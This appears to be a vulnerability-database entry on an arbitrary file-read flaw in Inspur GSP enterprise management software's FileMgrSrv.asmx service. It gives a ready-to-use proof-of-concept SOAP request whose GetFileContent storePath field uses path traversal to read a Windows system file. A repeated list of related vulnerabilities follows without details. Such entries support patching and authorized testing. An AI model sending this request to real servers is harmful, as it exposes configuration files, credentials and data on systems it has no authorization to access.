浪潮GSP企业管理软件 FileMgrSrv.asmx 文件读取漏洞

日期: 2025-07-14 11:25:30 | 影响软件: 浪潮GSP企业管理软件 | POC: 已公开

漏洞描述

文件读取漏洞是指攻击者通过某种方式获取对系统文件的读取权限，从而访问敏感信息，如配置文件、源代码、用户数据等。这种漏洞通常是由于应用程序未正确实施权限控制或者未对用户输入进行充分过滤和验证导致的。

PoC代码

POST /cwbase/service/cepp/FileMgrSrv.asmx HTTP/1.1
Host: 
SOAPAction: "http://tempuri.org/GetFileContent"
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetFileContent xmlns="http://tempuri.org/">
      <storePath>../../../windows/win.ini</storePath>
      <offSet>1</offSet>
    </GetFileContent>
  </soap:Body>
</soap:Envelope>

漏洞描述

PoC代码

相关漏洞推荐

浪潮GSP企业管理软件 PayOrderSrv.asmx 远程代码执行漏洞 无POC

浪潮GSP企业管理软件 bizintegrationwebservice.asmx 远程代码执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

浪潮GSP企业管理软件 PayOrderSrv.asmx 远程代码执行漏洞无POC

浪潮GSP企业管理软件 bizintegrationwebservice.asmx 远程代码执行漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC